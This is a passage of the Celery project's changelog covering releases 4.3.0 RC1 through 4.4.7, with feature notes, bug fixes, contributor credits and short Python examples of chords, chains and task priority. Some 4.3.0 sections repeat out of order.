Contributed by **Jeremy Cohen** Code Cleanups, Test Coverage & CI Improvements by: - **Omer Katz** - **Florian Chardin** Documentation Fixes by: - **Omer Katz** - **Samuel Huang** - **Amir Hossein Saeid Mehr** - **Dmytro Litvinov** 4.3.0 RC2 ========= :release-date: 2019-03-03 9:30 P.M UTC+2:00 :release-by: Omer Katz - **Filesystem Backend**: Added meaningful error messages for filesystem backend. Contributed by **Lars Rinn** - **New Result Backend**: Added the ArangoDB backend. Contributed by **Dilip Vamsi Moturi** - **Django**: Prepend current working directory instead of appending so that the project directory will have precedence over system modules as expected. Contributed by **Antonin Delpeuch** - Bump minimum py-redis version to 3.2.0. Due to multiple bugs in earlier versions of py-redis that were causing issues for Celery, we were forced to bump the minimum required version to 3.2.0. Contributed by **Omer Katz** - **Dependencies**: Bump minimum required version of Kombu to 4.4 Contributed by **Omer Katz** 4.3.0 RC1 ========= :release-date: 2019-02-20 5:00 PM IST :release-by: Omer Katz - **Canvas**: :meth:`celery.chain.apply` does not ignore keyword arguments anymore when applying the chain. Contributed by **Korijn van Golen** - **Result Set**: Don't attempt to cache results in a :class:`celery.result.ResultSet`. During a join, the results cache was populated using :meth:`celery.result.ResultSet.get`, if one of the results contains an exception, joining unexpectedly failed. The results cache is now removed. Contributed by **Derek Harland** - **Application**: :meth:`celery.Celery.autodiscover_tasks` now attempts to import the package itself when the `related_name` keyword argument is `None`. Contributed by **Alex Ioannidis** - **Windows Support**: On Windows 10, stale PID files prevented celery beat to run. We now remove them when a :class:`SystemExit` is raised. Contributed by **:github_user:`na387`** - **Task**: Added the new :setting:`task_acks_on_failure_or_timeout` setting. Acknowledging SQS messages on failure or timing out makes it impossible to use dead letter queues. We introduce the new option acks_on_failure_or_timeout, to ensure we can totally fallback on native SQS message lifecycle, using redeliveries for retries (in case of slow processing or failure) and transitions to dead letter queue after defined number of times. Contributed by **Mario Kostelac** - **RabbitMQ Broker**: Adjust HA headers to work on RabbitMQ 3.x. This change also means we're ending official support for RabbitMQ 2.x. Contributed by **Asif Saif Uddin** - **Command Line**: Improve :program:`celery update` error handling. Contributed by **Federico Bond** - **Canvas**: Support chords with :setting:`task_always_eager` set to `True`. Contributed by **Axel Haustant** - **Result Backend**: Optionally store task properties in result backend. Setting the :setting:`result_extended` configuration option to `True` enables storing additional task properties in the result backend. Contributed by **John Arnold** - **Couchbase Result Backend**: Allow the Couchbase result backend to automatically detect the serialization format. Contributed by **Douglas Rohde** - **New Result Backend**: Added the Azure Block Blob Storage result backend. The backend is implemented on top of the azure-storage library which uses Azure Blob Storage for a scalable low-cost PaaS backend. 
The backend was load tested via a simple nginx/gunicorn/sanic app hosted on a DS4 virtual machine (4 vCores, 16 GB RAM) and was able to handle 600+ concurrent users at ~170 RPS. The commit also contains a live end-to-end test to facilitate verification of the backend functionality. The test is activated by setting the `AZUREBLOCKBLOB_URL` environment variable to `azureblockblob://{ConnectionString}` where the value for `ConnectionString` can be found in the `Access Keys` pane of a Storage Account resources in the Azure Portal. Contributed by **Clemens Wolff** - **Task**: :meth:`celery.app.task.update_state` now accepts keyword arguments. This allows passing extra fields to the result backend. These fields are unused by default but custom result backends can use them to determine how to store results. Contributed by **Christopher Dignam** - Gracefully handle consumer :class:`kombu.exceptions.DecodeError`. When using the v2 protocol the worker no longer crashes when the consumer encounters an error while decoding a message. Contributed by **Steven Sklar** - **Deployment**: Fix init.d service stop. Contributed by **Marcus McHale** - **Django**: Drop support for Django < 1.11. Contributed by **Asif Saif Uddin** - **Django**: Remove old djcelery loader. Contributed by **Asif Saif Uddin** - **Result Backend**: :class:`celery.worker.request.Request` now passes :class:`celery.app.task.Context` to the backend's store_result functions. Since the class currently passes `self` to these functions, revoking a task resulted in corrupted task result data when django-celery-results was used. Contributed by **Kiyohiro Yamaguchi** - **Worker**: Retry if the heartbeat connection dies. Previously, we keep trying to write to the broken connection. This results in a memory leak because the event dispatcher will keep appending the message to the outbound buffer. Contributed by **Raf Geens** - **Celery Beat**: Handle microseconds when scheduling. Contributed by **K Davis** - **Asynpool**: Fixed deadlock when closing socket. Upon attempting to close a socket, :class:`celery.concurrency.asynpool.AsynPool` only removed the queue writer from the hub but did not remove the reader. This led to a deadlock on the file descriptor and eventually the worker stopped accepting new tasks. We now close both the reader and the writer file descriptors in a single loop iteration which prevents the deadlock. Contributed by **Joshua Engelman** - **Celery Beat**: Correctly consider timezone when calculating timestamp. Contributed by **:github_user:`yywing`** - **Celery Beat**: :meth:`celery.beat.Scheduler.schedules_equal` can now handle either arguments being a `None` value. Contributed by **:github_user:` ratson`** - **Documentation/Sphinx**: Fixed Sphinx support for shared_task decorated functions. Contributed by **Jon Banafato** - **New Result Backend**: Added the CosmosDB result backend. This change adds a new results backend. The backend is implemented on top of the pydocumentdb library which uses Azure CosmosDB for a scalable, globally replicated, high-performance, low-latency and high-throughput PaaS backend. Contributed by **Clemens Wolff** - **Application**: Added configuration options to allow separate multiple apps to run on a single RabbitMQ vhost. The newly added :setting:`event_exchange` and :setting:`control_exchange` configuration options allow users to use separate Pidbox exchange and a separate events exchange. This allow different Celery applications to run separately on the same vhost. 
Contributed by **Artem Vasilyev**

- **Result Backend**: Forget parent result metadata when forgetting a result. Contributed by **:github_user:`tothegump`**
- **Task**: Store task arguments inside :class:`celery.exceptions.MaxRetriesExceededError`. Contributed by **Anthony Ruhier**
- **Result Backend**: Added the :setting:`result_accept_content` setting. This feature allows you to configure different accepted content for the result backend. A special serializer (`auth`) is used for signed messaging, however the result_serializer remains in json, because we don't want encrypted content in our result backend. To accept unsigned content from the result backend, we introduced this new configuration option to specify the accepted content from the backend. Contributed by **Benjamin Pereto**
- **Canvas**: Fixed error callback processing for class based tasks. Contributed by **Victor Mireyev**
- **New Result Backend**: Added the S3 result backend. Contributed by **Florian Chardin**
- **Task**: Added support for Cythonized Celery tasks. Contributed by **Andrey Skabelin**
- **Riak Result Backend**: Warn Riak backend users about possible Python 3.7 incompatibilities. Contributed by **George Psarakis**
- **Python Runtime**: Added Python 3.7 support. Contributed by **Omer Katz** & **Asif Saif Uddin**
- **Auth Serializer**: Revamped the auth serializer. The auth serializer received a complete overhaul. It was previously horribly broken. We now depend on cryptography instead of pyOpenSSL for this serializer. Contributed by **Benjamin Pereto**
- **Command Line**: :program:`celery report` now reports kernel version along with other platform details. Contributed by **Omer Katz**
- **Canvas**: Fixed chords with chains which include sub chords in a group. Celery now correctly executes the last task in these types of canvases:

  .. code-block:: python

      c = chord(
          group([
              chain(
                  dummy.si(),
                  chord(
                      group([dummy.si(), dummy.si()]),
                      dummy.si(),
                  ),
              ),
              chain(
                  dummy.si(),
                  chord(
                      group([dummy.si(), dummy.si()]),
                      dummy.si(),
                  ),
              ),
          ]),
          dummy.si()
      )

      c.delay().get()

  Contributed by **Maximilien Cuony**
- **Canvas**: Complex canvases with error callbacks no longer raise an :class:`AttributeError`. Very complex canvases such as `this `_ no longer raise an :class:`AttributeError` which prevents constructing them. We do not know why this bug occurs yet. Contributed by **Manuel Vázquez Acosta**
- **Command Line**: Added proper error messages in cases where app cannot be loaded. Previously, celery crashed with an exception. We now print a proper error message. Contributed by **Omer Katz**
- **Task**: Added the :setting:`task_default_priority` setting. You can now set the default priority of a task using the :setting:`task_default_priority` setting. The setting's value will be used if no priority is provided for a specific task (see the sketch below). Contributed by **:github_user:`madprogrammer`**
- **Dependencies**: Bump minimum required version of Kombu to 4.3 and Billiard to 3.6. Contributed by **Asif Saif Uddin**
- **Result Backend**: Fix memory leak. We reintroduced weak references to bound methods for AsyncResult callback promises, after adding full weakref support for Python 2 in `vine `_. More details can be found in `celery/celery#4839 `_. Contributed by **George Psarakis** and **:github_user:`monsterxx03`**.
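A minimal sketch of the :setting:`task_default_priority` setting; the values and the ``add`` task are illustrative only:

.. code-block:: python

    # used whenever a task or call doesn't specify its own priority
    app.conf.task_default_priority = 5

    # an explicit priority on the call still takes precedence
    add.apply_async((2, 2), priority=9)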
- **Task Execution**: Fixed roundtrip serialization for eager tasks.

  When doing the roundtrip serialization for eager tasks, the task serializer will always be JSON unless the `serializer` argument is present in the call to :meth:`celery.app.task.Task.apply_async`. If the serializer argument is present but is `'pickle'`, an exception will be raised as pickle-serialized objects cannot be deserialized without specifying to `serialization.loads` what content types should be accepted.

  The Producer's `serializer` seems to be set to `None`, causing the default to JSON serialization. We now continue to use (in order) the `serializer` argument to :meth:`celery.app.task.Task.apply_async`, if present, or the `Producer`'s serializer if not `None`. If the `Producer`'s serializer is `None`, it will use the Celery app's `task_serializer` configuration entry as the serializer. Contributed by **Brett Jackson**
- **Redis Result Backend**: The :class:`celery.backends.redis.ResultConsumer` class no longer assumes :meth:`celery.backends.redis.ResultConsumer.start` to be called before :meth:`celery.backends.redis.ResultConsumer.drain_events`. This fixes a race condition when using the Gevent workers pool. Contributed by **Noam Kush**
- **Task**: Added the :setting:`task_inherit_parent_priority` setting. Setting the :setting:`task_inherit_parent_priority` configuration option to `True` will make Celery tasks inherit the priority of the previous task linked to it. Examples:

  .. code-block:: python

      c = celery.chain(
          add.s(2),                   # priority=None
          add.s(3).set(priority=5),   # priority=5
          add.s(4),                   # priority=5
          add.s(5).set(priority=3),   # priority=3
          add.s(6),                   # priority=3
      )

  .. code-block:: python

      @app.task(bind=True)
      def child_task(self):
          pass

      @app.task(bind=True)
      def parent_task(self):
          child_task.delay()

      # child_task will also have priority=5
      parent_task.apply_async(args=[], priority=5)

  Contributed by **:github_user:`madprogrammer`**
- **Canvas**: Added the :setting:`result_chord_join_timeout` setting. Previously, :meth:`celery.result.GroupResult.join` had a fixed timeout of 3 seconds. The :setting:`result_chord_join_timeout` setting now allows you to change it. Contributed by **:github_user:`srafehi`**

Code Cleanups, Test Coverage & CI Improvements by:

- **Jon Dufresne**
- **Asif Saif Uddin**
- **Omer Katz**
- **Brett Jackson**
- **Bruno Alla**
- **:github_user:`tothegump`**
- **Bojan Jovanovic**
- **Florian Chardin**
- **:github_user:`walterqian`**
- **Fabian Becker**
- **Lars Rinn**
- **:github_user:`madprogrammer`**
- **Ciaran Courtney**

Documentation Fixes by:

- **Lewis M. Kabui**
- **Dash Winterson**
- **Shanavas M**
- **Brett Randall**
- **Przemysław Suliga**
- **Joshua Schmid**
- **Asif Saif Uddin**
- **Xiaodong**
- **Vikas Prasad**
- **Jamie Alessio**
- **Lars Kruse**
- **Guilherme Caminha**
- **Andrea Rabbaglietti**
- **Itay Bittan**
- **Noah Hall**
- **Peng Weikang**
- **Mariatta Wijaya**
- **Ed Morley**
- **Paweł Adamczak**
- **:github_user:`CoffeeExpress`**
- **:github_user:`aviadatsnyk`**
- **Brian Schrader**
- **Josue Balandrano Coronel**
- **Tom Clancy**
- **Sebastian Wojciechowski**
- **Meysam Azad**
- **Willem Thiart**
- **Charles Chan**
- **Omer Katz**
- **Milind Shakya**
_changelog-4.4: =============== Change history =============== This document contains change notes for bugfix & new features in the 4.4.x series, please see :ref:`whatsnew-4.4` for an overview of what's new in Celery 4.4. 4.4.7 ======= :release-date: 2020-07-31 11.45 P.M UTC+6:00 :release-by: Asif Saif Uddin - Add task_received, task_rejected and task_unknown to signals module. - [ES backend] add 401 as safe for retry. - treat internal errors as failure. - Remove redis fanout caveats. - FIX: -A and --args should behave the same. (#6223) - Class-based tasks autoretry (#6233) - Preserve order of group results with Redis result backend (#6218) - Replace future with celery.five Fixes #6250, and use raise_with_context instead of reraise - Fix REMAP_SIGTERM=SIGQUIT not working - (Fixes#6258) MongoDB: fix for serialization issue (#6259) - Make use of ordered sets in Redis opt-in - Test, CI, Docker & style and minor doc improvements. 4.4.6 ======= :release-date: 2020-06-24 2.40 P.M UTC+6:00 :release-by: Asif Saif Uddin - Remove autoscale force_scale methods (#6085). - Fix autoscale test - Pass ping destination to request - chord: merge init options with run options - Put back KeyValueStoreBackend.set method without state - Added --range-prefix option to `celery multi` (#6180) - Added as_list function to AsyncResult class (#6179) - Fix CassandraBackend error in threads or gevent pool (#6147) - Kombu 4.6.11 4.4.5 ======= :release-date: 2020-06-08 12.15 P.M UTC+6:00 :release-by: Asif Saif Uddin - Add missing dependency on future (#6146). - ElasticSearch: Retry index if document was deleted between index - fix windows build - Customize the retry interval of chord_unlock tasks - fix multi tests in local 4.4.4 ======= :release-date: 2020-06-03 11.00 A.M UTC+6:00 :release-by: Asif Saif Uddin - Fix autoretry_for with explicit retry (#6138). - Kombu 4.6.10 - Use Django DB max age connection setting (fixes #4116). - Add retry on recoverable exception for the backend (#6122). - Fix random distribution of jitter for exponential backoff. - ElasticSearch: add setting to save meta as json. - fix #6136. celery 4.4.3 always trying create /var/run/celery directory. - Add task_internal_error signal (#6049). 4.4.3 ======= :release-date: 2020-06-01 4.00 P.M UTC+6:00 :release-by: Asif Saif Uddin - Fix backend utf-8 encoding in s3 backend . - Kombu 4.6.9 - Task class definitions can have retry attributes (#5869) - Upgraded pycurl to the latest version that supports wheel. - Add uptime to the stats inspect command - Fixing issue #6019: unable to use mysql SSL parameters when getting - Clean TraceBack to reduce memory leaks for exception task (#6024) - exceptions: NotRegistered: fix up language - Give up sending a worker-offline message if transport is not connected - Add Task to __all__ in celery.__init__.py - Ensure a single chain object in a chain does not raise MaximumRecursion - Fix autoscale when prefetch_multiplier is 1 - Allow start_worker to function without ping task - Update celeryd.conf - Fix correctly handle configuring the serializer for always_eager mode. - Remove doubling of prefetch_count increase when prefetch_multiplier - Fix eager function not returning result after retries - return retry result if not throw and is_eager - Always requeue while worker lost regardless of the redelivered flag - Allow relative paths in the filesystem backend (#6070) - [Fixed Issue #6017] - Avoid race condition due to task duplication. 
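As a rough illustration of the "Task class definitions can have retry attributes" item above (#5869), a class-based task can now declare its retry policy directly on the class. This is only a minimal sketch: the ``FetchReport`` task, its name and the broker URL are made up, and it assumes the ``requests`` package is installed.

.. code-block:: python

    import requests

    from celery import Celery, Task

    app = Celery('proj', broker='redis://localhost:6379/0')


    class FetchReport(Task):
        name = 'proj.fetch_report'

        # Retry options that previously had to be passed to the @task
        # decorator can now live on the class definition itself.
        autoretry_for = (requests.RequestException,)
        retry_kwargs = {'max_retries': 5}
        retry_backoff = True   # exponential backoff between retries
        retry_jitter = True    # randomize the backoff

        def run(self, url):
            return requests.get(url, timeout=10).text


    # Register the class-based task with the app.
    fetch_report = app.register_task(FetchReport())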
- Exceptions must be old-style classes or derived from BaseException
- Fix Windows build (#6104)
- Add encode to meta task in base.py (#5894)
- Update time.py to solve the microsecond issues (#5199)
- Change backend _ensure_not_eager error to warning
- Add priority support for 'celery.chord_unlock' task (#5766)
- Change eager retry behaviour
- Avoid race condition in elasticsearch backend
- Backends: base get_many now passes the READY_STATES arg
- Add integration tests for Elasticsearch and fix _update
- feat(backend): Adds cleanup to ArangoDB backend
- Remove Jython check
- Fix: the filesystem backend could not be serialized by pickle

4.4.0
=======
:release-date: 2019-12-16 9.45 A.M UTC+6:00
:release-by: Asif Saif Uddin

- This version is officially supported on CPython 2.7, 3.5, 3.6, 3.7 & 3.8
  and is also supported on PyPy2 & PyPy3.
- Kombu 4.6.7
- Task class definitions can have retry attributes (#5869)

4.4.0rc5
========
:release-date: 2019-12-07 21.05 A.M UTC+6:00
:release-by: Asif Saif Uddin

- Kombu 4.6.7
- Events bootstep disabled if no events (#5807)
- SQS - Reject on failure (#5843)
- Add a concurrency model with ThreadPoolExecutor (#5099)
- Add auto expiry for DynamoDB backend (#5805)
- Store extending result in all backends (#5661)
- Fix a race condition when publishing a very large chord header (#5850)
- Improve docs and test matrix

4.4.0rc4
========
:release-date: 2019-11-11 00.45 A.M UTC+6:00
:release-by: Asif Saif Uddin

- Kombu 4.6.6
- Py-AMQP 2.5.2
- Python 3.8
- Numerous bug fixes
- PyPy 7.2

4.4.0rc3
========
:release-date: 2019-08-14 23.00 P.M UTC+6:00
:release-by: Asif Saif Uddin

- Kombu 4.6.4
- Billiard 3.6.1
- Py-AMQP 2.5.1
- Avoid serializing datetime (#5606)
- Fix: (group() | group()) not equal to a single group (#5574)
- Revert "Broker connection uses the heartbeat setting from app config."
- Additional file descriptor safety checks.
- Fixed call for null args (#5631)
- Added generic path for cache backend.
- Fix Nested group(chain(group)) fails (#5638)
- Use self.run() when overriding __call__ (#5652)
- Fix termination of asyncloop (#5671)
- Fix migrate task to work with both v1 and v2 of the message protocol.
- Updating task_routes config during runtime now has effect.

4.4.0rc2
========
:release-date: 2019-06-15 4:00 A.M UTC+6:00
:release-by: Asif Saif Uddin

- Many bugs and regressions fixed.
- Kombu 4.6.3

4.4.0rc1
========
:release-date: 2019-06-06 1:00 P.M UTC+6:00
:release-by: Asif Saif Uddin

- Python 3.4 drop
- Kombu 4.6.1
- Replace deprecated PyMongo methods usage (#5443)
- Pass task request when calling update_state (#5474)
- Fix bug in remaining time calculation in case of DST time change (#5411)
- Fix missing task name when requesting extended result (#5439)
- Fix `collections` import issue on Python 2.7 (#5428)
- Handle `AttributeError` in base backend exception deserializer (#5435)
- Make `AsynPool`'s `proc_alive_timeout` configurable (#5476)
- AMQP support for extended result (#5495)
- Fix SQL Alchemy results backend to work with extended result (#5498)
- Fix restoring of exceptions with required param (#5500)
- Django: Re-raise exception if `ImportError` not caused by missing tasks
  module (#5211)
- Django: fixed a regression putting DB connections in invalid state when
  `CONN_MAX_AGE != 0` (#5515)
- Fixed `OSError` leading to lost connection to broker (#4457)
- Fixed an issue with the inspect API being unable to get details of a Request
- Fix MongoDB backend authentication (#5527)
- Change column type for Extended Task Meta args/kwargs to LargeBinary
- Handle http_auth in Elasticsearch backend results (#5545)
- Fix task serializer being ignored with `task_always_eager=True` (#5549)
- Fix `task.replace` to work in `.apply()` as well as `.apply_async()` (#5540)
- Fix sending of `worker_process_init` signal for solo worker (#5562)
- Fix exception message unpacking (#5565)
- Add delay parameter function to beat_schedule (#5558)
- Multiple documentation updates

4.3.0
=====
:release-date: 2019-03-31 7:00 P.M UTC+3:00
:release-by: Omer Katz

- Added support for broadcasting using a regular expression pattern
  or a glob pattern to multiple Pidboxes.

  This allows you to inspect or ping multiple workers at once.

  Contributed by **Dmitry Malinovsky** & **Jason Held**

- Added support for PEP 420 namespace packages.

  This allows you to load tasks from namespace packages.

  Contributed by **Colin Watson**

- Added :setting:`acks_on_failure_or_timeout` as a setting instead of
  a task only option.

  This was missing from the original PR but now added for completeness.

  Contributed by **Omer Katz**

- Added the :signal:`task_received` signal.

  Contributed by **Omer Katz**

- Fixed a crash of our CLI that occurred for everyone using Python < 3.6.

  The crash was introduced in `acd6025 `_ by using the
  :class:`ModuleNotFoundError` exception which was introduced in Python 3.6.

  Contributed by **Omer Katz**

- Fixed a crash that occurred when using the Redis result backend
  while the :setting:`result_expires` is set to None.

  Contributed by **Toni Ruža** & **Omer Katz**

- Added support for the `DNS seedlist connection format `_
  for the MongoDB result backend.

  This requires the `dnspython` package which will be installed by default
  when installing the dependencies for the MongoDB result backend.

  Contributed by **George Psarakis**

- Bump the minimum eventlet version to 0.24.1.

  Contributed by **George Psarakis**

- Replace the `msgpack-python` package with `msgpack`.

  We're no longer using the deprecated package.
  See our :ref:`important notes ` for this release
  for further details on how to upgrade.

  Contributed by **Daniel Hahler**

- Allow scheduling error handlers which are not registered tasks in the
  current worker.

  These kinds of error handlers are now possible: ..
code-block:: python from celery import Signature Signature( 'bar', args=['foo'], link_error=Signature('msg.err', queue='msg') ).apply_async() - Additional fixes and enhancements to the SSL support of the Redis broker and result backend. Contributed by **Jeremy Cohen** Code Cleanups, Test Coverage & CI Improvements by: - **Omer Katz** - **Florian Chardin** Documentation Fixes by: - **Omer Katz** - **Samuel Huang** - **Amir Hossein Saeid Mehr** - **Dmytro Litvinov** 4.3.0 RC2 ========= :release-date: 2019-03-03 9:30 P.M UTC+2:00 :release-by: Omer Katz - **Filesystem Backend**: Added meaningful error messages for filesystem backend. Contributed by **Lars Rinn** - **New Result Backend**: Added the ArangoDB backend. Contributed by **Dilip Vamsi Moturi** - **Django**: Prepend current working directory instead of appending so that the project directory will have precedence over system modules as expected. Contributed by **Antonin Delpeuch** - Bump minimum py-redis version to 3.2.0. Due to multiple bugs in earlier versions of py-redis that were causing issues for Celery, we were forced to bump the minimum required version to 3.2.0. Contributed by **Omer Katz** - **Dependencies**: Bump minimum required version of Kombu to 4.4 Contributed by **Omer Katz** 4.3.0 RC1 ========= :release-date: 2019-02-20 5:00 PM IST :release-by: Omer Katz - **Canvas**: :meth:`celery.chain.apply` does not ignore keyword arguments anymore when applying the chain. Contributed by **Korijn van Golen** - **Result Set**: Don't attempt to cache results in a :class:`celery.result.ResultSet`. During a join, the results cache was populated using :meth:`celery.result.ResultSet.get`, if one of the results contains an exception, joining unexpectedly failed. The results cache is now removed. Contributed by **Derek Harland** - **Application**: :meth:`celery.Celery.autodiscover_tasks` now attempts to import the package itself when the `related_name` keyword argument is `None`. Contributed by **Alex Ioannidis** - **Windows Support**: On Windows 10, stale PID files prevented celery beat to run. We now remove them when a :class:`SystemExit` is raised. Contributed by **:github_user:`na387`** - **Task**: Added the new :setting:`task_acks_on_failure_or_timeout` setting. Acknowledging SQS messages on failure or timing out makes it impossible to use dead letter queues. We introduce the new option acks_on_failure_or_timeout, to ensure we can totally fallback on native SQS message lifecycle, using redeliveries for retries (in case of slow processing or failure) and transitions to dead letter queue after defined number of times. Contributed by **Mario Kostelac** - **RabbitMQ Broker**: Adjust HA headers to work on RabbitMQ 3.x. This change also means we're ending official support for RabbitMQ 2.x. Contributed by **Asif Saif Uddin** - **Command Line**: Improve :program:`celery update` error handling. Contributed by **Federico Bond** - **Canvas**: Support chords with :setting:`task_always_eager` set to `True`. Contributed by **Axel Haustant** - **Result Backend**: Optionally store task properties in result backend. Setting the :setting:`result_extended` configuration option to `True` enables storing additional task properties in the result backend. Contributed by **John Arnold** - **Couchbase Result Backend**: Allow the Couchbase result backend to automatically detect the serialization format. Contributed by **Douglas Rohde** - **New Result Backend**: Added the Azure Block Blob Storage result backend. 
The backend is implemented on top of the azure-storage library which uses Azure Blob Storage for a scalable low-cost PaaS backend. The backend was load tested via a simple nginx/gunicorn/sanic app hosted on a DS4 virtual machine (4 vCores, 16 GB RAM) and was able to handle 600+ concurrent users at ~170 RPS. The commit also contains a live end-to-end test to facilitate verification of the backend functionality. The test is activated by setting the `AZUREBLOCKBLOB_URL` environment variable to `azureblockblob://{ConnectionString}` where the value for `ConnectionString` can be found in the `Access Keys` pane of a Storage Account resources in the Azure Portal. Contributed by **Clemens Wolff** - **Task**: :meth:`celery.app.task.update_state` now accepts keyword arguments. This allows passing extra fields to the result backend. These fields are unused by default but custom result backends can use them to determine how to store results. Contributed by **Christopher Dignam** - Gracefully handle consumer :class:`kombu.exceptions.DecodeError`. When using the v2 protocol the worker no longer crashes when the consumer encounters an error while decoding a message. Contributed by **Steven Sklar** - **Deployment**: Fix init.d service stop. Contributed by **Marcus McHale** - **Django**: Drop support for Django < 1.11. Contributed by **Asif Saif Uddin** - **Django**: Remove old djcelery loader. Contributed by **Asif Saif Uddin** - **Result Backend**: :class:`celery.worker.request.Request` now passes :class:`celery.app.task.Context` to the backend's store_result functions. Since the class currently passes `self` to these functions, revoking a task resulted in corrupted task result data when django-celery-results was used. Contributed by **Kiyohiro Yamaguchi** - **Worker**: Retry if the heartbeat connection dies. Previously, we keep trying to write to the broken connection. This results in a memory leak because the event dispatcher will keep appending the message to the outbound buffer. Contributed by **Raf Geens** - **Celery Beat**: Handle microseconds when scheduling. Contributed by **K Davis** - **Asynpool**: Fixed deadlock when closing socket. Upon attempting to close a socket, :class:`celery.concurrency.asynpool.AsynPool` only removed the queue writer from the hub but did not remove the reader. This led to a deadlock on the file descriptor and eventually the worker stopped accepting new tasks. We now close both the reader and the writer file descriptors in a single loop iteration which prevents the deadlock. Contributed by **Joshua Engelman** - **Celery Beat**: Correctly consider timezone when calculating timestamp. Contributed by **:github_user:`yywing`** - **Celery Beat**: :meth:`celery.beat.Scheduler.schedules_equal` can now handle either arguments being a `None` value. Contributed by **:github_user:` ratson`** - **Documentation/Sphinx**: Fixed Sphinx support for shared_task decorated functions. Contributed by **Jon Banafato** - **New Result Backend**: Added the CosmosDB result backend. This change adds a new results backend. The backend is implemented on top of the pydocumentdb library which uses Azure CosmosDB for a scalable, globally replicated, high-performance, low-latency and high-throughput PaaS backend. Contributed by **Clemens Wolff** - **Application**: Added configuration options to allow separate multiple apps to run on a single RabbitMQ vhost. 
The newly added :setting:`event_exchange` and :setting:`control_exchange` configuration options allow users to use separate Pidbox exchange and a separate events exchange. This allow different Celery applications to run separately on the same vhost. Contributed by **Artem Vasilyev** - **Result Backend**: Forget parent result metadata when forgetting a result. Contributed by **:github_user:`tothegump`** - **Task** Store task arguments inside :class:`celery.exceptions.MaxRetriesExceededError`. Contributed by **Anthony Ruhier** - **Result Backend**: Added the :setting:`result_accept_content` setting. This feature allows to configure different accepted content for the result backend. A special serializer (`auth`) is used for signed messaging, however the result_serializer remains in json, because we don't want encrypted content in our result backend. To accept unsigned content from the result backend, we introduced this new configuration option to specify the accepted content from the backend. Contributed by **Benjamin Pereto** - **Canvas**: Fixed error callback processing for class based tasks. Contributed by **Victor Mireyev** - **New Result Backend**: Added the S3 result backend. Contributed by **Florian Chardin** - **Task**: Added support for Cythonized Celery tasks. Contributed by **Andrey Skabelin** - **Riak Result Backend**: Warn Riak backend users for possible Python 3.7 incompatibilities. Contributed by **George Psarakis** - **Python Runtime**: Added Python 3.7 support. Contributed by **Omer Katz** & **Asif Saif Uddin** - **Auth Serializer**: Revamped the auth serializer. The auth serializer received a complete overhaul. It was previously horribly broken. We now depend on cryptography instead of pyOpenSSL for this serializer. Contributed by **Benjamin Pereto** - **Command Line**: :program:`celery report` now reports kernel version along with other platform details. Contributed by **Omer Katz** - **Canvas**: Fixed chords with chains which include sub chords in a group. Celery now correctly executes the last task in these types of canvases: .. code-block:: python c = chord( group([ chain( dummy.si(), chord( group([dummy.si(), dummy.si()]), dummy.si(), ), ), chain( dummy.si(), chord( group([dummy.si(), dummy.si()]), dummy.si(), ), ), ]), dummy.si() ) c.delay().get() Contributed by **Maximilien Cuony** - **Canvas**: Complex canvases with error callbacks no longer raises an :class:`AttributeError`. Very complex canvases such as `this `_ no longer raise an :class:`AttributeError` which prevents constructing them. We do not know why this bug occurs yet. Contributed by **Manuel Vázquez Acosta** - **Command Line**: Added proper error messages in cases where app cannot be loaded. Previously, celery crashed with an exception. We now print a proper error message. Contributed by **Omer Katz** - **Task**: Added the :setting:`task_default_priority` setting. You can now set the default priority of a task using the :setting:`task_default_priority` setting. The setting's value will be used if no priority is provided for a specific task. Contributed by **:github_user:`madprogrammer`** - **Dependencies**: Bump minimum required version of Kombu to 4.3 and Billiard to 3.6. Contributed by **Asif Saif Uddin** - **Result Backend**: Fix memory leak. We reintroduced weak references to bound methods for AsyncResult callback promises, after adding full weakref support for Python 2 in `vine `_. More details can be found in `celery/celery#4839 `_. 
Contributed by **George Psarakis** and **:github_user:`monsterxx03`**. - **Task Execution**: Fixed roundtrip serialization for eager tasks. When doing the roundtrip serialization for eager tasks, the task serializer will always be JSON unless the `serializer` argument is present in the call to :meth:`celery.app.task.Task.apply_async`. If the serializer argument is present but is `'pickle'`, an exception will be raised as pickle-serialized objects cannot be deserialized without specifying to `serialization.loads` what content types should be accepted. The Producer's `serializer` seems to be set to `None`, causing the default to JSON serialization. We now continue to use (in order) the `serializer` argument to :meth:`celery.app.task.Task.apply_async`, if present, or the `Producer`'s serializer if not `None`. If the `Producer`'s serializer is `None`, it will use the Celery app's `task_serializer` configuration entry as the serializer. Contributed by **Brett Jackson** - **Redis Result Backend**: The :class:`celery.backends.redis.ResultConsumer` class no longer assumes :meth:`celery.backends.redis.ResultConsumer.start` to be called before :meth:`celery.backends.redis.ResultConsumer.drain_events`. This fixes a race condition when using the Gevent workers pool. Contributed by **Noam Kush** - **Task**: Added the :setting:`task_inherit_parent_priority` setting. Setting the :setting:`task_inherit_parent_priority` configuration option to `True` will make Celery tasks inherit the priority of the previous task linked to it. Examples: .. code-block:: python c = celery.chain( add.s(2), # priority=None add.s(3).set(priority=5), # priority=5 add.s(4), # priority=5 add.s(5).set(priority=3), # priority=3 add.s(6), # priority=3 ) .. code-block:: python @app.task(bind=True) def child_task(self): pass @app.task(bind=True) def parent_task(self): child_task.delay() # child_task will also have priority=5 parent_task.apply_async(args=[], priority=5) Contributed by **:github_user:`madprogrammer`** - **Canvas**: Added the :setting:`result_chord_join_timeout` setting. Previously, :meth:`celery.result.GroupResult.join` had a fixed timeout of 3 seconds. The :setting:`result_chord_join_timeout` setting now allows you to change it. Contributed by **:github_user:`srafehi`** Code Cleanups, Test Coverage & CI Improvements by: - **Jon Dufresne** - **Asif Saif Uddin** - **Omer Katz** - **Brett Jackson** - **Bruno Alla** - **:github_user:`tothegump`** - **Bojan Jovanovic** - **Florian Chardin** - **:github_user:`walterqian`** - **Fabian Becker** - **Lars Rinn** - **:github_user:`madprogrammer`** - **Ciaran Courtney** Documentation Fixes by: - **Lewis M. 
